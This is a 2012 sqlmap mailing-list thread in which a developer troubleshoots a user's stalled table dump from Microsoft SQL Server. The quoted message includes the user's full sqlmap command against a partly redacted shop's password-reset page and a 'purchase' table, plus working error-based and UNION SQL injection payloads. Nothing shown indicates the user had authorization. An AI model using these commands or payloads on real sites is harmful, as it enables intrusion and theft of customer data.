Re: [sqlmap-users] sqlmap stuck + can not retrieve all rows in aerror based sql injection
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] sqlmap stuck + can not retrieve all rows in aerror based sql injection
|
From: Miroslav S. <mir...@gm...> - 2012-04-10 18:17:31
|
Hi. On Tue, Apr 10, 2012 at 5:00 PM, Daniel Shapira <fai...@gm... > wrote: > Hey guys > i have a problem here > take a look > sqlmap almost always stuck with the message - [WARNING] no proper pivot > column > provided (with unique values). It wo > n't be possible to retrieve all rows > This is exactly what it says. As there is no LIMIT/OFFSET mechanism in MsSQL we use "pivoting" for retrieving data in MsSQL. Unique values for one column are retrieved while the rest of columns are retrieved through "WHERE <pivot_column>=current" relation. > even if i let it run for days it will not dump a thing, > People. If sqlmap doesn't dump anything "for minutes" then there is no need for running it "for days". In those kind of situations options like --parse-errors or -t traffic.txt are gold. > sometimes it does retrieve some data put out of 1000 rows it will return > around > 10 rows only > Is there a way for you to send me privately content of traffic file for such run (you just have to append --fresh-queries -t traffic.txt to the end of used commands) Also, it would be great if you could just try for yourself to run that case with --no-cast switch and report back if that helped Kind regards, Miroslav Stampar > hope someone can help me with that > thanks > Microsoft Windows [Version 6.1.7600] > Copyright (c) 2009 Microsoft Corporation. All rights reserved. > > F:\Users\Dan>cd desktop/sqlmap > > F:\Users\Dan\Desktop\sqlmap>sqlmap.py --random-agent -u > http://www.xxxxxxxx.co.il:80/forgotpass.asp--data="cmdLogin==???&sEmail=1" -D > camera4less -T dbo.xxxx -C xxx,xxx,xxx,xxx --dump > > sqlmap/1.0-dev (r4976) - automatic SQL injection and database takeover > tool > http://www.sqlmap.org > > [!] legal disclaimer: usage of sqlmap for attacking targets without prior > mutual > consent is illegal. It is the end user's responsibility to obey all > applicable > local, state and federal laws. Authors assume no liability and are not > responsib > le for any misuse or damage caused by this program > > [*] starting at 17:49:12 > > [17:49:13] [INFO] fetched random HTTP User-Agent header from file > 'F:\Users\xxx\ > Desktop\sqlmap\txt\user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; > en-US) A > ppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3 > [17:49:13] [INFO] using 'F:\Users\xxx\Desktop\sqlmap\output\www.xxxxx.co.i > l\session' as session file > [17:49:13] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from > sessio > n file > [17:49:13] [INFO] testing connection to the target url > sqlmap identified the following injection points with a total of 0 HTTP(s) > reque > sts: > --- > Place: POST > Parameter: sEmail > Type: error-based > Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING > clause > Payload: cmdLogin==???&sEmail=1' AND > 6043=CONVERT(INT,(CHAR(58)+CHAR(111)+CH > AR(102)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6043=6043) THEN CHAR(49) > ELSE CHAR > (48) END))+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(58))) AND > 'rxzU'='rxzU > > Type: UNION query > Title: Generic UNION query (NULL) - 2 columns > Payload: cmdLogin==???&sEmail=1' UNION ALL SELECT > CHAR(58)+CHAR(111)+CHAR(10 > > 2)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(79)+CHAR(87)+CHAR(108)+CHAR(111)+CH > > AR(87)+CHAR(121)+CHAR(87)+CHAR(90)+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(5 > 8), NULL-- AND 'lpxC'='lpxC > --- > > [17:49:13] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2003 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2000 > do you want sqlmap to consider provided column(s): > [1] as LIKE column names (default) > [2] as exact column names > > 2 > > [17:49:17] [INFO] fetching columns 'xxx, xxx, xxx, xxx' for table 'xxx' in > database 'xxx' > [17:49:17] [INFO] the SQL query used returns 4 entries > [17:49:17] [INFO] resumed: "xxx","varchar" > [17:49:17] [INFO] resumed: "xxx","varchar" > [17:49:17] [INFO] resumed: "xxx","varchar" > [17:49:17] [INFO] resumed: "xxx","varchar" > [17:49:17] [INFO] fetching entries of column(s) 'xxx, xxx, xxx, xxx' for > table > 'purchase' in database 'xxx' > [17:49:17] [INFO] fetching number of distinct values for column 'xxx' > [17:49:18] [INFO] fetching number of distinct values for column 'xxx' > [17:49:18] [INFO] fetching number of distinct values for column 'xxx > me' > [17:49:18] [INFO] fetching number of distinct values for column 'xxx' > [17:49:18] [WARNING] no proper pivot column provided (with unique values). > It wo > n't be possible to retrieve all rows > > > ------------------------------------------------------------------------------ > Better than sec? Nothing is better than sec when it comes to > monitoring Big Data applications. Try Boundary one-second > resolution app monitoring today. Free. > http://p.sf.net/sfu/Boundary-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
